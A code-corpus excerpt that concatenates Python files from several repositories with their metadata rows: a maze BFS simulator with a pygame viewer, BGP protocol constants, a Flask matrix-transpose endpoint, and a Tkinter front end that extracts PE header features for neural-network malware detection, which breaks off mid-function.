self.grid[random_index][first] = True
self.grid[random_index + adding_num][second] = True
# generate the floors
for _i in range(horizontal_amount):
random_index = random.randrange(0, total)
adding_num = self.width * -1 if random_index > (total - self.width) else self.width
first = "floor" if adding_num == self.width else "roof"
second = "floor" if first == "roof" else "roof"
self.grid[random_index][first] = True
self.grid[random_index + adding_num - 1][second] = True
def can_move_from(self, cell_index):
# TODO this works but its a lot of repeated code. Can it be made better?
# can you move left
can_move_left = False
is_left = True if cell_index % self.width == 0 else False
if not is_left and self.grid[cell_index]["left"] == False:
left_cell = self.grid[cell_index - 1]
is_wall_left = True if left_cell["right"] == True else False
can_move_left = True if not is_wall_left else False
# can you move right
can_move_right = False
is_right = True if cell_index % self.width == self.width-1 else False
if not is_right and self.grid[cell_index]["right"] == False:
right_cell = self.grid[cell_index + 1]
is_wall_right = True if right_cell["left"] == True else False
can_move_right = True if not is_wall_right else False
# can you move up
can_move_up = False
is_top = True if cell_index < self.width else False
if not is_top and self.grid[cell_index]["roof"] == False:
top_cell = self.grid[cell_index - self.width]
is_wall_top = True if top_cell["floor"] == True else False
can_move_up = True if not is_wall_top else False
# can you move down
can_move_down = False
        is_bottom = True if cell_index >= (self.width * self.height - self.width) else False
if not is_bottom and self.grid[cell_index]["floor"] == False:
bottom_cell = self.grid[cell_index + self.width]
is_wall_bottom = True if bottom_cell["roof"] == True else False
can_move_down = True if not is_wall_bottom else False
# return the results
return can_move_left, can_move_right, can_move_up, can_move_down
def BFS(self):
"""breadth first search to find the quickest way to the bottom"""
start_i = random.randrange(0,self.width)
paths = [ [start_i] ]
solved = False
dead_ends = []
while not solved:
for path in paths:
# find all possibles moves from path
if len(dead_ends) >= len(paths) or len(paths) > 10000: # TODO this solution sucks
return False, False
# NOTE order is left right up down
if path[-1] >= (self.width * self.height - self.width):
solved = True
return paths, paths.index(path)
possible_moves = self.can_move_from(path[-1])
if True in possible_moves:
move_order = [-1, 1, (self.width) * -1, self.width]
first_append_flag = False
origonal_path = path.copy()
for i in range(4):
possible_move = possible_moves[i]
if possible_move:
move = move_order[i]
next_index = origonal_path[-1] + move
if not next_index in origonal_path:
if not first_append_flag:
path.append(next_index)
first_append_flag = True
else:
new_path = origonal_path.copy()
new_path.append(next_index)
paths.append(new_path)
if not first_append_flag:
dead_ends.append(paths.index(path))
else:
dead_ends.append(paths.index(path))
def pretty_print_BFS(self, path):
for i in range(self.width * self.height):
cell = self.grid[i]
in_path = True if cell["ID"] in path else False
number_str = str(i)
if len(number_str) == 1:
number_str += " "
elif len(number_str) == 2:
number_str += " "
end_str = "\n" if i % self.width == self.width-1 else " "
if in_path:
print('\033[92m' + number_str + '\033[0m', end=end_str)
else:
print(number_str, end=end_str)
print(path)
if __name__ == "__main__":
b = Board(10)
paths, index = b.BFS()
    if paths is not False and index is not False:
        b.pretty_print_BFS(paths[index])
    else:
        print('No path to the bottom was found')
# can_move_left, can_move_right, can_move_up, can_move_down = b.can_move_from(0)
# print("can_move_left ", can_move_left)
# print("can_move_right ", can_move_right)
# print("can_move_up ", can_move_up)
# print("can_move_down ", can_move_down)
|
Python
| 191
| 35.329842
| 97
|
/lib/board.py
| 0.51333
| 0.506269
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# use pygame to show the board on a window
# dependencies
import pygame, random
class Window:
def __init__(self, board):
# init py game
pygame.init()
# width height
self.WIDTH = 600
self.HEIGHT = 600
        # different display modes
self.display_one = False
self.display_all = False
# place holder
self.solution = []
self.display_all_c = 0
# the board to display on the window
self.board = board
# define the dimensions of the cells of the board
self.cell_width = self.WIDTH // self.board.width
# define the left padding for the grid
total_width = self.cell_width * self.board.width
self.left_padding = (self.WIDTH - total_width) // 2
# colors
self.COLORS = {
"BLACK" : (255, 255, 255),
"GREY" : (230, 230, 230),
"BLUE" : (0, 0, 255),
"RED" : (255, 0, 0),
"YELLOW" : (212, 175, 55)
}
def create_random_color(self):
return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
def create_window(self):
# define window
self.WIN = pygame.display.set_mode( (self.WIDTH, self.HEIGHT) )
# name window
pygame.display.set_caption("LIGHT NING")
# logo/icon for window
logo = pygame.image.load("images/logo.png")
pygame.display.set_icon(logo)
def get_BFS(self):
solved = False
while not solved:
self.board.create_random_grid()
paths, index = self.board.BFS()
            if paths is not False and index is not False:
self.solution = paths[index]
solved = True
self.paths = paths
self.solution_i = index
def draw_grid_solution(self):
fflag = True
for i in range(self.board.width * self.board.height):
if not i in self.solution: continue
# might not work
col_num = i % self.board.width
row_num = i // self.board.width
x_pos = self.left_padding + (col_num * self.cell_width)
y_pos = row_num * self.cell_width
# define rect
r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width)
# draw the rectangle
pygame.draw.rect(self.WIN, self.COLORS["YELLOW"], r)
def draw_BFS(self):
if self.display_all_c >= len(self.paths):
self.display_all_c = 0
# generate a color for each path
path_colors = []
for path in self.paths:
path_colors.append(self.create_random_color())
path_colors[-1] = (0, 0 ,0)
temp = self.paths.pop(self.display_all_c)
self.paths.append(temp)
for path in self.paths:
for i in path:
# might not work
col_num = i % self.board.width
row_num = i // self.board.width
x_pos = self.left_padding + (col_num * self.cell_width)
y_pos = row_num * self.cell_width
# define rect
r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width)
# draw the rectangle
pygame.draw.rect(self.WIN, path_colors[self.paths.index(path)], r)
self.display_all_c += 1
def draw_window(self):
self.WIN.fill(self.COLORS["GREY"])
if self.display_one:
self.draw_grid_solution()
elif self.display_all:
self.draw_BFS()
pygame.display.update()
def main(self):
# create window
self.create_window()
self.running = True
while self.running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_0:
self.get_BFS()
elif event.key == pygame.K_1:
# toggle display one
self.display_one = not self.display_one
if self.display_one:
self.display_all = False
elif event.key == pygame.K_2:
# toggle display all
self.display_all = not self.display_all
if self.display_all:
self.display_all_c = 0
self.display_one = False
self.draw_window()
if __name__ == "__main__":
win = Window()
win.main()
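# Key bindings implemented in main() above: 0 recomputes a BFS solution on a fresh random grid,
# 1 toggles drawing only the solution path, 2 toggles drawing every explored path.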
|
Python
| 159
| 28.754717
| 87
|
/lib/window.py
| 0.501057
| 0.487104
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# this could and will be better i just needed to make it here as a
# proof of concept but it will be online and better later
import os, sys
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # adds project dir to places it looks for the modules
sys.path.append(BASE_PATH)
from lib.board import Board
from lib.window import Window
b = Board()
win = Window(b)
win.main()
|
Python
| 15
| 25.4
| 125
|
/main.py
| 0.736709
| 0.736709
|
JoeChan/openbgp
|
refs/heads/master
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" All BGP constant values """
# some handy things to know
BGP_MAX_PACKET_SIZE = 4096
BGP_MARKER_SIZE = 16 # size of BGP marker
BGP_HEADER_SIZE = 19 # size of BGP header, including marker
BGP_MIN_OPEN_MSG_SIZE = 29
BGP_MIN_UPDATE_MSG_SIZE = 23
BGP_MIN_NOTIFICATION_MSG_SIZE = 21
BGP_MIN_KEEPALVE_MSG_SIZE = BGP_HEADER_SIZE
BGP_TCP_PORT = 179
BGP_ROUTE_DISTINGUISHER_SIZE = 8
# BGP message types
BGP_OPEN = 1
BGP_UPDATE = 2
BGP_NOTIFICATION = 3
BGP_KEEPALIVE = 4
BGP_ROUTE_REFRESH = 5
BGP_CAPABILITY = 6
BGP_ROUTE_REFRESH_CISCO = 0x80
BGP_SIZE_OF_PATH_ATTRIBUTE = 2
# attribute flags, from RFC1771
BGP_ATTR_FLAG_OPTIONAL = 0x80
BGP_ATTR_FLAG_TRANSITIVE = 0x40
BGP_ATTR_FLAG_PARTIAL = 0x20
BGP_ATTR_FLAG_EXTENDED_LENGTH = 0x10
# SSA flags
BGP_SSA_TRANSITIVE = 0x8000
BGP_SSA_TYPE = 0x7FFF
# SSA Types
BGP_SSA_L2TPv3 = 1
BGP_SSA_mGRE = 2
BGP_SSA_IPSec = 3
BGP_SSA_MPLS = 4
BGP_SSA_L2TPv3_IN_IPSec = 5
BGP_SSA_mGRE_IN_IPSec = 6
# AS_PATH segment types
AS_SET = 1 # RFC1771
AS_SEQUENCE = 2 # RFC1771
AS_CONFED_SET = 4 # RFC1965 has the wrong values, corrected in
AS_CONFED_SEQUENCE = 3 # draft-ietf-idr-bgp-confed-rfc1965bis-01.txt
# OPEN message Optional Parameter types
BGP_OPTION_AUTHENTICATION = 1 # RFC1771
BGP_OPTION_CAPABILITY = 2 # RFC2842
# attribute types
BGPTYPE_ORIGIN = 1 # RFC1771
BGPTYPE_AS_PATH = 2 # RFC1771
BGPTYPE_NEXT_HOP = 3 # RFC1771
BGPTYPE_MULTI_EXIT_DISC = 4 # RFC1771
BGPTYPE_LOCAL_PREF = 5 # RFC1771
BGPTYPE_ATOMIC_AGGREGATE = 6 # RFC1771
BGPTYPE_AGGREGATOR = 7 # RFC1771
BGPTYPE_COMMUNITIES = 8 # RFC1997
BGPTYPE_ORIGINATOR_ID = 9 # RFC2796
BGPTYPE_CLUSTER_LIST = 10 # RFC2796
BGPTYPE_DPA = 11 # work in progress
BGPTYPE_ADVERTISER = 12 # RFC1863
BGPTYPE_RCID_PATH = 13 # RFC1863
BGPTYPE_MP_REACH_NLRI = 14 # RFC2858
BGPTYPE_MP_UNREACH_NLRI = 15 # RFC2858
BGPTYPE_EXTENDED_COMMUNITY = 16 # Draft Ramachandra
BGPTYPE_NEW_AS_PATH = 17 # draft-ietf-idr-as4bytes
BGPTYPE_NEW_AGGREGATOR = 18 # draft-ietf-idr-as4bytes
BGPTYPE_SAFI_SPECIFIC_ATTR = 19 # draft-kapoor-nalawade-idr-bgp-ssa-00.txt
BGPTYPE_TUNNEL_ENCAPS_ATTR = 23 # RFC5512
BGPTYPE_LINK_STATE = 99
BGPTYPE_ATTRIBUTE_SET = 128
# VPN Route Target #
BGP_EXT_COM_RT_0 = 0x0002 # Route Target,Format AS(2bytes):AN(4bytes)
BGP_EXT_COM_RT_1 = 0x0102 # Route Target,Format IPv4 address(4bytes):AN(2bytes)
BGP_EXT_COM_RT_2 = 0x0202 # Route Target,Format AS(4bytes):AN(2bytes)
# Route Origin (SOO site of Origin)
BGP_EXT_COM_RO_0 = 0x0003 # Route Origin,Format AS(2bytes):AN(4bytes)
BGP_EXT_COM_RO_1 = 0x0103 # Route Origin,Format IP address:AN(2bytes)
BGP_EXT_COM_RO_2 = 0x0203 # Route Origin,Format AS(2bytes):AN(4bytes)
# BGP Flow Spec
BGP_EXT_TRA_RATE = 0x8006 # traffic-rate 2-byte as#, 4-byte float
BGP_EXT_TRA_ACTION = 0x8007 # traffic-action bitmask
BGP_EXT_REDIRECT = 0x8008 # redirect 6-byte Route Target
BGP_EXT_TRA_MARK = 0x8009 # traffic-marking DSCP value
# BGP cost cummunity
BGP_EXT_COM_COST = 0x4301
# BGP link bandwith
BGP_EXT_COM_LINK_BW = 0x4004
# NLRI type as define in BGP flow spec RFC
BGPNLRI_FSPEC_DST_PFIX = 1 # RFC 5575
BGPNLRI_FSPEC_SRC_PFIX = 2 # RFC 5575
BGPNLRI_FSPEC_IP_PROTO = 3 # RFC 5575
BGPNLRI_FSPEC_PORT = 4 # RFC 5575
BGPNLRI_FSPEC_DST_PORT = 5 # RFC 5575
BGPNLRI_FSPEC_SRC_PORT = 6 # RFC 5575
BGPNLRI_FSPEC_ICMP_TP = 7 # RFC 5575
BGPNLRI_FSPEC_ICMP_CD = 8 # RFC 5575
BGPNLRI_FSPEC_TCP_FLAGS = 9 # RFC 5575
BGPNLRI_FSPEC_PCK_LEN = 10 # RFC 5575
BGPNLRI_FSPEC_DSCP = 11 # RFC 5575
BGPNLRI_FSPEC_FRAGMENT = 12 # RFC 5575
# BGP message Constants
VERSION = 4
PORT = 179
HDR_LEN = 19
MAX_LEN = 4096
# BGP messages type
MSG_OPEN = 1
MSG_UPDATE = 2
MSG_NOTIFICATION = 3
MSG_KEEPALIVE = 4
MSG_ROUTEREFRESH = 5
MSG_CISCOROUTEREFRESH = 128
# BGP Capabilities Support
SUPPORT_4AS = False
CISCO_ROUTE_REFRESH = False
NEW_ROUTE_REFRESH = False
GRACEFUL_RESTART = False
# AFI_SAFI mapping
AFI_SAFI_DICT = {
(1, 1): 'ipv4',
(1, 4): 'label_ipv4',
(1, 128): 'vpnv4',
(2, 1): 'ipv6',
(2, 4): 'label_ipv6',
(2, 128): 'vpnv6'
}
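# Example lookups: AFI_SAFI_DICT[(1, 1)] == 'ipv4' and AFI_SAFI_DICT[(1, 128)] == 'vpnv4'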
AFI_SAFI_STR_DICT = {
'ipv4': (1, 1),
'ipv6': (1, 2)
}
# BGP FSM State
ST_IDLE = 1
ST_CONNECT = 2
ST_ACTIVE = 3
ST_OPENSENT = 4
ST_OPENCONFIRM = 5
ST_ESTABLISHED = 6
# BGP Timer (seconds)
DELAY_OPEN_TIME = 10
ROUTE_REFRESH_TIME = 10
LARGER_HOLD_TIME = 4 * 60
CONNECT_RETRY_TIME = 30
IDLEHOLD_TIME = 30
HOLD_TIME = 120
stateDescr = {
ST_IDLE: "IDLE",
ST_CONNECT: "CONNECT",
ST_ACTIVE: "ACTIVE",
ST_OPENSENT: "OPENSENT",
ST_OPENCONFIRM: "OPENCONFIRM",
ST_ESTABLISHED: "ESTABLISHED"
}
# Notification error codes
ERR_MSG_HDR = 1
ERR_MSG_OPEN = 2
ERR_MSG_UPDATE = 3
ERR_HOLD_TIMER_EXPIRED = 4
ERR_FSM = 5
ERR_CEASE = 6
# Notification suberror codes
ERR_MSG_HDR_CONN_NOT_SYNC = 1
ERR_MSG_HDR_BAD_MSG_LEN = 2
ERR_MSG_HDR_BAD_MSG_TYPE = 3
ERR_MSG_OPEN_UNSUP_VERSION = 1
ERR_MSG_OPEN_BAD_PEER_AS = 2
ERR_MSG_OPEN_BAD_BGP_ID = 3
ERR_MSG_OPEN_UNSUP_OPT_PARAM = 4
ERR_MSG_OPEN_UNACCPT_HOLD_TIME = 6
ERR_MSG_OPEN_UNSUP_CAPA = 7 # RFC 5492
ERR_MSG_OPEN_UNKNO = 8
ERR_MSG_UPDATE_MALFORMED_ATTR_LIST = 1
ERR_MSG_UPDATE_UNRECOGNIZED_WELLKNOWN_ATTR = 2
ERR_MSG_UPDATE_MISSING_WELLKNOWN_ATTR = 3
ERR_MSG_UPDATE_ATTR_FLAGS = 4
ERR_MSG_UPDATE_ATTR_LEN = 5
ERR_MSG_UPDATE_INVALID_ORIGIN = 6
ERR_MSG_UPDATE_INVALID_NEXTHOP = 8
ERR_MSG_UPDATE_OPTIONAL_ATTR = 9
ERR_MSG_UPDATE_INVALID_NETWORK_FIELD = 10
ERR_MSG_UPDATE_MALFORMED_ASPATH = 11
ERR_MSG_UPDATE_UNKOWN_ATTR = 12
AttributeID_dict = {
1: 'ORIGIN',
2: 'AS_PATH',
3: 'NEXT_HOP',
4: 'MULTI_EXIT_DISC',
5: 'LOCAL_PREF',
6: 'ATOMIC_AGGREGATE',
7: 'AGGREGATOR',
8: 'COMMUNITY',
9: 'ORIGINATOR_ID',
10: 'CLUSTER_LIST',
14: 'MP_REACH_NLRI',
15: 'MP_UNREACH_NLRI',
16: 'EXTENDED_COMMUNITY',
17: 'AS4_PATH',
18: 'AS4_AGGREGATOR'
}
ATTRSTR_DICT = {
'AGGREGATOR': 7,
'AS4_AGGREGATOR': 18,
'AS4_PATH': 17,
'AS_PATH': 2,
'ATOMIC_AGGREGATE': 6,
'CLUSTER_LIST': 10,
'COMMUNITY': 8,
'EXTENDED_COMMUNITY': 16,
'LOCAL_PREFERENCE': 5,
'MP_REACH_NLRI': 14,
'MP_UNREACH_NLRI': 15,
'MULTI_EXIT_DISC': 4,
'NEXT_HOP': 3,
'ORIGIN': 1,
'ORIGINATOR_ID': 9}
TCP_MD5SIG_MAXKEYLEN = 80
SS_PADSIZE_IPV4 = 120
TCP_MD5SIG = 14
SS_PADSIZE_IPV6 = 100
SIN6_FLOWINFO = 0
SIN6_SCOPE_ID = 0
COMMUNITY_DICT = False
|
Python
| 267
| 24.932585
| 80
|
/openbgp/common/constants.py
| 0.69103
| 0.617362
|
Glitchfix/TransposeMatrixIndorse
|
refs/heads/master
|
from flask import Flask, render_template, request, jsonify
from flask_cors import CORS
import json
import numpy as np
app = Flask(__name__)
CORS(app)
@app.route('/transpose', methods=["POST"])
def homepage():
data = request.json
result = None
error = ""
try:
mat = data["matrix"]
mat = np.array(mat)
result = mat.T.tolist()
error = ""
except KeyError as e:
error = "Key %s not found" % (str(e))
pass
except Exception as e:
error = str(e)
pass
return jsonify({"result": result, "error": error})
app.run()
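# Illustrative request against the default local Flask server (port 5000):
#   curl -X POST -H "Content-Type: application/json" \
#        -d '{"matrix": [[1, 2], [3, 4]]}' http://127.0.0.1:5000/transpose
#   -> {"error": "", "result": [[1, 3], [2, 4]]}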
|
Python
| 29
| 19.724138
| 58
|
/server.py
| 0.579035
| 0.579035
|
shlsheth263/malware-detection-using-ANN
|
refs/heads/master
|
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import test_python3
class Root(Tk):
def __init__(self):
super(Root, self).__init__()
self.title("Malware Detection")
self.minsize(500, 300)
self.labelFrame = ttk.LabelFrame(self, text = " Open File")
self.labelFrame.grid(column = 0, row = 1, padx = 200, pady = 20)
self.button()
def button(self):
self.button = ttk.Button(self.labelFrame, text = "Browse A File",command = self.fileDialog)
self.button.grid(column = 1, row = 1)
def fileDialog(self):
self.filename = filedialog.askopenfilename(initialdir = "/", title = "Select A File")
self.label = ttk.Label(self.labelFrame, text = "")
self.label.grid(column = 1, row = 2)
self.label.configure(text = self.filename)
root = Root()
root.mainloop()
|
Python
| 35
| 24.685715
| 99
|
/python/gui.py
| 0.620267
| 0.600223
|
shlsheth263/malware-detection-using-ANN
|
refs/heads/master
|
#!/usr/bin/env python
import sys
import time
import pandas as pd
import pepy
import binascii
import numpy as np
from hashlib import md5
import sklearn
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from tensorflow.keras.models import load_model
def test(p):
exe = {}
print("Signature: %s" % int(p.signature))
exe['Signature'] = int(p.signature)
exe['Magic'] = int(p.magic)
print("Machine: %s (%s)" % (int(p.machine), p.get_machine_as_str()))
exe['Machine'] = int(p.machine), p.get_machine_as_str()
print("Number of sections: %s" % p.numberofsections)
exe['Number of Sections'] = p.numberofsections
print("Number of symbols: %s" % p.numberofsymbols)
exe['Number of symbols'] = p.numberofsymbols
print("Characteristics: %s" % int(p.characteristics))
exe['characteristics'] = int(p.characteristics)
exe['timestamp'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(p.timedatestamp))
print("Timedatestamp: %s" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(p.timedatestamp)))
exe['CodeSize'] = int(p.codesize)
print("Size of code: %s" % int(p.codesize))
exe['SizeofInitial'] = int(p.initdatasize)
print("Size of initialized data: %s" % int(p.initdatasize))
exe['UninitSize'] = int(p.uninitdatasize)
print("Size of uninitialized data: %s" % int(p.uninitdatasize))
exe['Baseofcode'] = int(p.baseofcode)
print("Base address of code: %s" % int(p.baseofcode))
try:
exe['baseaddr'] = int(p.baseofdata)
print("Base address of data: %s" % int(p.baseofdata))
except:
# Not available on PE32+, ignore it.
pass
exe['imagebase'] = int(p.imagebase)
print("Image base address: %s" % int(p.imagebase))
exe['sectionalign'] = int(p.sectionalignement)
print("Section alignment: %s" % int(p.sectionalignement))
exe['filealign'] = int(p.filealignment)
print("File alignment: %s" % int(p.filealignment))
exe['imagesize'] = int(p.imagesize)
print("Size of image: %s" % int(p.imagesize))
exe['headersize'] = int(p.headersize)
print("Size of headers: %s" % int(p.headersize))
exe['checksum'] = int(p.checksum)
print("Checksum: %s" % int(p.checksum))
exe['dllchar'] = int(p.dllcharacteristics)
print("DLL characteristics: %s" % int(p.dllcharacteristics))
exe['stacksize'] = int(p.stackreservesize)
print("Size of stack reserve: %s" % int(p.stackreservesize))
exe['stackcommit'] = int(p.stackcommitsize)
print("Size of stack commit: %s" % int(p.stackcommitsize))
exe['heapsize'] = int(p.heapreservesize)
print("Size of heap reserve: %s" % int(p.heapreservesize))
exe['heapcommit'] = int(p.heapcommitsize)
print("Size of heap commit: %s" % int(p.heapcommitsize))
exe['rva'] = int(p.rvasandsize)
print("Number of RVA and sizes: %s" % int(p.rvasandsize))
ep = p.get_entry_point()
byts = p.get_bytes(ep, 8)
print("Bytes at %s: %s" % (int(ep), ' '.join(['%#2x' % b for b in byts])))
sections = p.get_sections()
print("Sections: (%i)" % len(sections))
for sect in sections:
print("[+] %s" % sect.name)
print("\tBase: %s" % int(sect.base))
print("\tLength: %s" % sect.length)
print("\tVirtual address: %s" % int(sect.virtaddr))
print("\tVirtual size: %i" % sect.virtsize)
print("\tNumber of Relocations: %i" % sect.numrelocs)
print("\tNumber of Line Numbers: %i" % sect.numlinenums)
print("\tCharacteristics: %s" % int(sect.characteristics))
if sect.length:
print("\tFirst 10 bytes: 0x%s" % binascii.hexlify(sect.data[:10]))
print("\tMD5: %s" % md5(sect.data).hexdigest())
imports = p.get_imports()
print("Imports: (%i)" % len(imports))
l = []
for imp in imports:
l.append((imp.sym, imp.name, int(imp.addr)))
# exe['symbol'] = imp.sym,imp.name,int(imp.addr)
print("[+] Symbol: %s (%s %s)" % (imp.sym, imp.name, int(imp.addr)))
exe['symbol'] = l
exports = p.get_exports()
print("Exports: (%i)" % len(exports))
for exp in exports:
exe['module'] = exp.mod, exp.func, int(exp.addr)
print("[+] Module: %s (%s %s)" % (exp.mod, exp.func, int(exp.addr)))
relocations = p.get_relocations()
print("Relocations: (%i)" % len(relocations))
for reloc in relocations:
print("[+] Type: %s (%s)" % (reloc.type, int(reloc.addr)))
resources = p.get_resources()
print("Resources: (%i)" % len(resources))
for resource in resources:
print("[+] MD5: (%i) %s" % (len(resource.data), md5(resource.data).hexdigest()))
if resource.type_str:
print("\tType string: %s" % resource.type_str)
else:
print("\tType: %s (%s)" % (int(resource.type), resource.type_as_str()))
if resource.name_str:
print("\tName string: %s" % resource.name_str)
else:
print("\tName: %s" % int(resource.name))
if resource.lang_str:
print("\tLang string: %s" % resource.lang_str)
else:
print("\tLang: %s" % int(resource.lang))
print("\tCodepage: %s" % int(resource.codepage))
print("\tRVA: %s" % int(resource.RVA))
print("\tSize: %s" % int(resource.size))
return exe
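# Illustrative call (the file path below is hypothetical): features = test(pepy.parse("sample.exe"))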
class Root(Tk):
def __init__(self):
super(Root, self).__init__()
self.mean_entropy = 6.69
self.mean_size = 6.895724 * 10 ** 6
self.mean_pointer = 5.513845 * 10 ** 5
self.mean_petype = 267
self.mean_optionalHeader = 224
self.mean_timestamp = 1.223333 * 10 ** 9
self.var = [2.45814868e+00, 5.78522477e+05, 4.59263747e-02, 3.94699109e+00
, 5.56093128e+05, 4.23275300e-02, 4.28793369e+00, 5.09558456e+05
, 4.26259209e-02, 4.52582805e+00, 5.00721420e+05, 4.38214743e-02
, 4.80847515e+00, 3.36937892e+05, 3.42121736e-02, 5.08079739e+00
, 2.82976405e+05, 3.27880482e-02, 5.19862150e+00, 2.51661820e+05
, 3.03001968e-02, 5.49108651e+00, 2.74803628e+05, 2.34008748e-02
, 5.65433567e+00, 2.61551950e+05, 2.20549168e-02, 5.82167673e+00
, 2.75945872e+05, 1.92542233e-02, 5.39081620e+00, 2.43941220e+05
, 1.66215197e-02, 5.25240971e+00, 2.13100610e+05, 1.38812852e-02
, 4.97209114e+00, 1.79580514e+05, 1.12734193e-02, 4.91835550e+00
, 1.81600442e+05, 9.08298818e-03, 4.67832320e+00, 1.75802757e+05
, 7.47834940e-03, 4.43536234e+00, 1.83062732e+05, 5.76560040e-03
, 3.36212748e+00, 1.05659050e+05, 4.12555574e-03, 3.44924796e+00
, 1.24784300e+05, 3.04785086e-03, 2.55147211e+00, 1.04770043e+05
, 2.20631168e-03, 2.63965525e+00, 1.31953132e+05, 1.50017798e-03
, 1.35032309e+13, 5.91049166e+13, 2.74411618e+08, 2.27146205e+08
, 1.30716250e+00, 1.02203650e+06, 1.64823331e+17, 9.70130473e+00
, 0.00000000e+00, 6.95117702e+14, 6.26391725e+00, 6.32965418e+14
, 0.00000000e+00, 1.39712067e+15, 3.09269595e+15, 2.53964553e+12
, 1.60595659e+06, 2.89297402e+14, 2.38878188e+15, 0.00000000e+00
, 1.35741026e+13, 8.21475966e+16, 8.55336176e-02, 1.57953396e-02
, 1.06058200e-02, 8.71010278e-03, 7.42508784e-03, 6.52156777e-03
, 5.72855385e-03, 4.99552441e-03, 4.36254449e-03, 3.93076962e-03
, 3.63767050e-03, 3.37999893e-03, 3.20280197e-03, 3.04227928e-03
, 2.93082120e-03, 2.85412932e-03, 2.79797761e-03, 2.71092621e-03
, 2.61535713e-03, 2.55340228e-03, 2.48501139e-03, 2.42902100e-03
, 2.36850195e-03, 2.29861381e-03, 2.23819994e-03, 2.17795827e-03
, 2.11676028e-03, 2.06515542e-03, 2.01478973e-03, 1.96564128e-03
, 1.91556309e-03, 1.86943149e-03, 1.83240435e-03, 1.79120738e-03
, 1.75672559e-03, 1.71652747e-03, 1.68120594e-03, 1.65315473e-03
, 1.62036128e-03, 1.59368312e-03, 1.56195259e-03, 1.53480747e-03
, 1.50568561e-03, 1.48263107e-03, 1.46131105e-03, 1.43606408e-03
, 1.41276985e-03, 1.39413270e-03, 1.37646323e-03, 1.35706705e-03]
self.mean = [3.38644034e+00, 7.43425464e+02, 6.40294006e-01, 3.41446464e+00
, 7.43311042e+02, 3.93069798e-01, 3.44198895e+00, 7.65279393e+02
, 3.30402571e-01, 3.37149071e+00, 7.42151971e+02, 2.99447860e-01
, 3.17242069e+00, 5.44187845e+02, 2.54659310e-01, 3.13009675e+00
, 4.84051874e+02, 2.31965387e-01, 3.03159921e+00, 4.77210895e+02
, 2.11030105e-01, 2.91210220e+00, 4.75812355e+02, 1.79221157e-01
, 2.48661283e+00, 4.07247419e+02, 1.46988188e-01, 2.35089123e+00
, 4.09849329e+02, 1.27373824e-01, 2.05407365e+00, 3.31339017e+02
, 1.09869680e-01, 1.83130422e+00, 2.84458239e+02, 9.13302463e-02
, 1.65633359e+00, 2.43290193e+02, 7.70382677e-02, 1.53908652e+00
, 2.37653259e+02, 6.49126524e-02, 1.40798980e+00, 2.15514487e+02
, 5.50734013e-02, 1.27721807e+00, 2.05804280e+02, 4.48429695e-02
, 9.54851129e-01, 1.16369741e+02, 3.33964758e-02, 9.08127297e-01
, 1.24898928e+02, 2.66482729e-02, 6.62233444e-01, 1.04622009e+02
, 1.90757276e-02, 6.01659959e-01, 1.28183120e+02, 1.37406010e-02
, 1.70803755e+05, 8.91260553e+05, 1.89259938e+04, 1.02192320e+04
, 6.69685927e+00, 8.22232244e+02, 1.63555414e+08, 3.32080948e+02
, 2.67000000e+02, 5.19991299e+05, 5.71698208e+00, 2.24746765e+05
, 2.67000000e+02, 6.57049714e+05, 6.93815969e+06, 6.83251704e+05
, 1.59274898e+03, 2.44727973e+06, 1.63751281e+06, 2.24000000e+02
, 1.71372990e+05, 1.22412702e+09, 3.23793663e-01, 1.76607058e-01
, 1.55393276e-01, 1.45630353e-01, 1.37842988e-01, 1.31876001e-01
, 1.25851666e-01, 1.20359017e-01, 1.15054661e-01, 1.10336582e-01
, 1.05885689e-01, 1.01550953e-01, 9.65836144e-02, 9.22891413e-02
, 8.80601110e-02, 8.45020529e-02, 8.11572167e-02, 7.87433791e-02
, 7.69100818e-02, 7.45285251e-02, 7.27705280e-02, 7.10439361e-02
, 6.96190823e-02, 6.82907176e-02, 6.71648772e-02, 6.60168642e-02
, 6.49738245e-02, 6.39356689e-02, 6.31187099e-02, 6.23316077e-02
, 6.14790592e-02, 6.07008932e-02, 5.98904188e-02, 5.90441028e-02
, 5.82944078e-02, 5.76313235e-02, 5.69379230e-02, 5.60963207e-02
, 5.53104343e-02, 5.47383798e-02, 5.40714718e-02, 5.34539907e-02
, 5.28624994e-02, 5.23242945e-02, 5.18031428e-02, 5.11818326e-02
, 5.05779398e-02, 4.99491364e-02, 4.95038547e-02, 4.90042634e-02]
self.mean=np.array(self.mean)
self.var=np.array(self.var)
def fileDialog(self):
x = test(pepy.parse(self.filename))
importedDLL = set()
importedSymbols = set()
for row in x['symbol']:
importedSymbols.add(row[0])
importedDLL.add(row[1])
self.x_list = [x['Baseofcode'], x['baseaddr'], x['characteristics'], x['dllchar'], self.mean_entropy,
x['filealign'], x['imagebase'], list(importedDLL), list(importedSymbols), x['Machine'][0],
x['Magic'], x['rva'], x['Number of Sections'], x['Number of symbols'], self.mean_petype,
self.mean_pointer, self.mean_size, x['CodeSize'], x['headersize'], x['imagesize'],
x['SizeofInitial'], self.mean_optionalHeader, x['UninitSize'], self.mean_timestamp]
y = ""
z = ""
m = np.array(self.x_list)
imported_dlls = m[7]
imported_syms = m[8]
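# note: the two np.delete calls below drop index 7 twice, which removes the imported-DLL list
# and then the imported-symbol list (shifted into index 7), leaving only numeric features for the model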
m = np.delete(m, 7)
m = np.delete(m, 7)
m = np.reshape(m, (1, m.shape[0]))
print("m:", m)
x_test = m
n_x_test = np.zeros(shape=(x_test.shape[0], 132))
for i in range(0, x_test.shape[0]):
if i % 1000 == 0:
print(i)
row = df.iloc[i + 40001, :]
